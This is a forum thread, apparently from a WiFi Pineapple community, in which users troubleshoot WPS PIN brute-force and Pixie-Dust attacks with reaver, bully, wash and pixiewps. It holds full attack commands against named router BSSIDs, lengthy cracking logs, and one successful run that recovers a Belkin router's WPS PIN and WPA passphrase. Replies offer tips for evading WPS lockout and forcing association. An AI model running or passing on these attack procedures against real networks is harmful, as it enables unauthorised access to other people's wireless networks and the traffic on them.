Marco Rossi Posted July 29, 2015 Share Posted July 29, 2015 Wash and bully work with the disabled wlan1 tough I have to prevent wps lockout somehow. root@WIN7B2:~# bully mon0 -b A0:F3:B2:E4:3A:62 -e "myAP" -c 4 [!] Bully v1.0-22 - WPS vulnerability assessment utility [+] Switching interface 'mon0' to channel '4' [!] Using '00:15:25:94:44:11' for the source MAC address [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from 'a0:f3:b2:e4:3a:62' on channel '4' [+] Got beacon for 'myAP' (a0:f3:b2:e4:3a:62) [+] Loading randomized pins from '/root/.bully/pins' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '44421090' [+] Rx( M5 ) = 'Pin1Bad' Next pin '50901098' [+] Rx( Auth ) = 'Timeout' Next pin '50901098' [+] Rx( Assn ) = 'Timeout' Next pin '50901098' [+] Rx( Auth ) = 'Timeout' Next pin '50901098' [+] Rx( Assn ) = 'Timeout' Next pin '50901098' [+] Rx( Assn ) = 'Timeout' Next pin '50901098' [!] Received M2D or out of sequence WPS Message [+] Rx( M5 ) = 'WPSFail' Next pin '50901098' [+] Rx( Auth ) = 'Timeout' Next pin '50901098' [+] Rx( Assn ) = 'Timeout' Next pin '50901098' [+] Rx( Assn ) = 'Timeout' Next pin '50901098' [+] Rx( M5 ) = 'Pin1Bad' Next pin '10541098' [+] Rx( Auth ) = 'Timeout' Next pin '10541098' [+] Sent packet not acknowledged after 3 attempts [+] Tx( Auth ) = 'Timeout' Next pin '10541098' [+] Rx( Assn ) = 'Timeout' Next pin '10541098' [+] Rx( Assn ) = 'Timeout' Next pin '10541098' [+] Rx( Auth ) = 'Timeout' Next pin '10541098' [+] Rx( M5 ) = 'Pin1Bad' Next pin '11481096' [+] Rx( Auth ) = 'Timeout' Next pin '11481096' [+] Rx( Assn ) = 'Timeout' Next pin '11481096' [+] Rx( M5 ) = 'Pin1Bad' Next pin '85851092' [!] WPS lockout reported, sleeping for 43 seconds ... [!] WPS lockout reported, sleeping for 43 seconds ... Current Disk Usage: Filesystem Size Used Available Use% Mounted on rootfs 3.2M 740.0K 2.5M 23% / /dev/root 11.8M 11.8M 0 100% /rom tmpfs 30.2M 124.0K 30.1M 0% /tmp tmpfs 512.0K 0 512.0K 0% /dev /dev/mtdblock3 3.2M 740.0K 2.5M 23% /overlay overlayfs:/overlay 3.2M 740.0K 2.5M 23% / /dev/sdcard/sd1 2.8G 106.0M 2.5G 4% /sd Current Memory Usage: total used free shared buffers Mem: 61804 43664 18140 0 6152 -/+ buffers: 37512 24292 Swap: 1000132 0 1000132 Here is my disk usage. Unfortunately reaver still gives me the same errors as before. Thanks for the help. Quote Link to comment Share on other sites More sharing options...
Marco Rossi Posted July 31, 2015 Share Posted July 31, 2015 Okay, doing a wash scan via ssh, try taking down the monitor mode enabled device before using wash / reaver / bully. After another reset I installed reaver and bully on the sd card but either cannot associate or never sends a pin. mkdir /etc/reaver opkg update opkg -d sd install reaver ln -s /sd/etc/reaver/reaver.db /etc/reaver/ ln -s /sd/usr/bin/reaver /usr/bin/ ln -s /sd/usr/bin/wash /usr/bin/ Quote Link to comment Share on other sites More sharing options...
chrisonline909 Posted August 31, 2015 Share Posted August 31, 2015 Hello Guys im having a issue with reaver not getting the correct information from the ap to do a successful reaver attack. ive tried the same ap on kali and it gets the pin and pass phrase. any help would be appreciated!! thank you root@Pineapple:~# reaver -i wlan1mon -c7 -b XX:XX:XX:53:12:6C -vvv -K 1 Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg [+] Switching wlan1mon to channel 7 [+] Waiting for beacon from XX:XX:XX:53:12:6C [+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 1142bb9d3b345c4655f269e279a47ac8 [P] PKE: d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b [P] WPS Manufacturer: Belkin International [P] WPS Model Name: Belkin N600DB Wireless Router [P] WPS Model Number: F9K1102 v2 [P] Access Point Serial Number: 20422GF2204541 [+] Received M1 message [P] R-Nonce: aa2e55a0e5abae5201c8c664efb46df6 [P] PKR: 4c24122323090189f6e58696e76769aceff61432b8aa4fcea7ff12eeaefd42cd52d2a56077452875df2419e0544192ad03287838d6e1811c887f123b1e87e2a00863e1b6a93216677e8e9f7f1f6280ba8eb13dbf2a56eb30478636bf4fa650bdbb436c7dbf198b622ff10e505a66d7e6452eb2fe25c7b06f448d4d79681adfd28f30395c656bf1ac5295f1ecfaf0bd0966497e1cf11ce02f0a6f6033e8fd66e3f6affdf0f5f42ded54ee7e61c3add7b810b6178e941d0a78b3384aeb61925d51 [P] AuthKey: 6111f2697163f20b7a7aee495b94b8ccd3f080904c0038765e0cbd91e057f393 [+] Sending M2 message [P] E-Hash1: dd1337c644e08b60bdedd33c558ec78713364d3ea7a76d110f49a886f39918b4 [P] E-Hash2: d437d4e3a0bcb16bcb4124162e6f5ccd21e5a3a5d5ed2d8e0a483c79113ddf4e [+] Running pixiewps with the information, wait ... [Pixie-Dust] [Pixie-Dust] Pixiewps 1.1 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust] [*] Time taken: 12 s 80 ms [Pixie-Dust] [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data. [Pixie-Dust] [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes [Pixie-Dust] [Pixie-Dust] Pixiewps 1.1 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] root@Pineapple:~# root@kali11:/home/chris# reaver -i wlan1mon -c 7 -b XX:XX:XX:XX:XX:XX -vvv -K 1 Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg [+] Switching wlan1mon to channel 7 [+] Waiting for beacon from XX:XX:XX:53:12:6C [+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 3e:2b:ce:1b:1d:a2:da:88:6f:b1:ea:f9:0e:7f:12:c5 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Belkin International [P] WPS Model Name: Belkin N600DB Wireless Router [P] WPS Model Number: F9K1102 v2 [P] Access Point Serial Number: 20422GF2204541 [+] Received M1 message [P] R-Nonce: 5b:95:e2:eb:9e:ee:fb:be:b3:d8:23:8e:83:8a:1e:45 [P] PKR: 51:aa:9d:86:4e:69:69:00:b7:c1:63:ae:4c:88:fb:00:80:25:be:06:e1:ec:27:49:51:25:cd:9f:7b:56:19:a3:de:98:ee:98:e8:f5:ae:90:3e:68:14:12:0f:de:5b:b9:c9:f3:69:9b:e8:d8:29:a1:7d:c8:9b:86:c1:d1:17:40:2c:ea:69:74:70:91:74:c2:b7:49:1e:00:ce:8a:de:9e:e0:b1:e8:bb:d7:64:96:9f:d3:d6:e6:a2:09:af:da:c2:af:a2:3f:7d:02:db:d2:1b:65:c9:ef:ef:f6:ca:af:4f:d4:0e:43:53:10:01:ca:d8:73:40:57:8a:b1:26:d3:fc:2d:85:cf:2f:59:53:89:cb:e2:00:ca:b6:6d:d4:3b:c3:fe:70:7c:36:6d:9e:0c:db:f6:0a:f0:96:fc:d3:1a:ac:23:34:d2:e9:4c:4f:87:d7:77:82:bc:2c:5d:20:d7:df:1f:f8:a1:44:4b:5a:50:25:d0:a4:fb:3d:15:b4:11:06 [P] AuthKey: bb:74:56:24:e7:dd:ac:a7:8a:09:1e:a2:d9:60:ec:43:83:66:59:16:e7:3e:36:dd:57:9a:33:30:51:ea:86:3c [+] Sending M2 message [P] E-Hash1: af:c3:d0:f7:e9:b8:8f:16:37:89:bf:79:24:1e:99:d9:0f:8e:ce:2e:2c:9b:14:9c:a3:7c:74:4b:a9:eb:03:75 [P] E-Hash2: 9b:9f:14:f8:55:90:5d:b6:18:8d:93:7b:86:e1:f0:5e:d7:34:ed:a3:06:4e:6b:0a:37:8b:e5:ab:ed:a0:d3:b3 [+] Running pixiewps with the information, wait ... [Pixie-Dust] [Pixie-Dust] Pixiewps 1.1 [Pixie-Dust] [Pixie-Dust] [*] E-S1: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15 [Pixie-Dust] [*] E-S2: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15 [Pixie-Dust] [+] WPS pin: 14987236 [Pixie-Dust] [+] Running reaver with the correct pin, wait ... [+] Cmd : reaver -i wlan1mon -b 94:10:3E:53:12:6C -c 7 -s y -vv -p 14987236 [Reaver Test] [+] BSSID: XX:XX:XX:53:12:6C [Reaver Test] [+] Channel: 7 [Reaver Test] [+] WPS PIN: '14987236' [Reaver Test] [+] WPA PSK: 'XXXXXXXX' [Reaver Test] [+] AP SSID: 'XXXXXX' Quote Link to comment Share on other sites More sharing options...
ghostheadx2 Posted December 30, 2015 Share Posted December 30, 2015 for me it tries the same pin over and over. how do I change the arguments so it doesn't ignore it and tries a new pin even if it doesn't get a nack Quote Link to comment Share on other sites More sharing options...
AlfAlfa Posted December 30, 2015 Share Posted December 30, 2015 for me it tries the same pin over and over. how do I change the arguments so it doesn't ignore it and tries a new pin even if it doesn't get a nack I'm not sure that you can... Have you tried playing around with the arguments though? For picky accesspoints I've found -N for no nacks helps, and increasing delays. Even the -n for other nack related... Maybe -w act like a windows registrar... I know I've had that feeling too that, maybe it is is getting it, just not telling me... However when changing it to the correct pin, and it's still failing, well maybe the access point is being clever or something... I've also noticed sometimes you have to manually associate with aireplay-ng as for some reason reaver itself has trouble associating with certain APs... Basically exhaust all possibilities with the switches! Quote Link to comment Share on other sites More sharing options...
Ted_ Posted January 27, 2016 Share Posted January 27, 2016 I’ve been trying to get reaver working on the nano for about 5 hours now... Wash reports nothing with WPS, Airodump does. Reaver is working from another device on my router, just not from the nano, I'v tried using external NICs on the pineapple aswell, i'm using the version in the pineapples repos. I'v also tried taking wlan1 down before and after and doing airmon-ng check kill, trying all parameters in wash. Any ideas? CH 6 ][ Elapsed: 12 s ][ 2016-01-27 08:08 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS ESSID 10:6F:3F:62:04:59 -58 100 135 1510 102 6 54e WPA2 CCMP PSK 1.0 Buffalo Soldier BSSID STATION PWR Rate Lost Frames Probe root@Pineapple:/usr/lib# wash -i wlan1mon Wash v1.5.2 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg BSSID Channel RSSI WPS Version WPS Locked ESSID -------------------------------------------------------------------------------------- root@Pineapple:/usr/lib# reaver -i wlan1mon -b 10:6F:3F:62:04:59 -c 6 Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg [+] Waiting for beacon from 10:6F:3F:62:04:59 [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null)) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [+] Associated with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) [!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier) Quote Link to comment Share on other sites More sharing options...
zabses Posted May 22, 2016 Share Posted May 22, 2016 Hello! Share please Make file for reaver_Big_endian-2 Â Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted May 22, 2016 Share Posted May 22, 2016 37 minutes ago, zabses said: Hello! Share please Make file for reaver_Big_endian-2  To be honest you can use a tool called https://github.com/aanarchyy/bully with a bit of work. Quote Link to comment Share on other sites More sharing options...
zabses Posted May 23, 2016 Share Posted May 23, 2016 15 hours ago, ZaraByte said: To be honest you can use a tool called https://github.com/aanarchyy/bully with a bit of work. Thank you, I know about the bully and collected me it is firmware I would like to raise it with openwrt reaver_Big_endian-2 P.S. Sorry for my english (google translator) Quote Link to comment Share on other sites More sharing options...
omzer Posted July 22, 2016 Share Posted July 22, 2016 Same, reaver does not associate. Bully gets the timeouts. Seems to work on kali and card ok... Quote Link to comment Share on other sites More sharing options...
mile18 Posted March 24, 2017 Share Posted March 24, 2017 Can someone please put Makefile for pixiewps becouse i can't find it anywhere :( Quote Link to comment Share on other sites More sharing options...
zabses Posted March 24, 2017 Share Posted March 24, 2017 4 hours ago, mile18 said: Can someone please put Makefile for pixiewps becouse i can't find it anywhere :( https://github.com/wiire/pixiewps/blob/master/Makefile Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.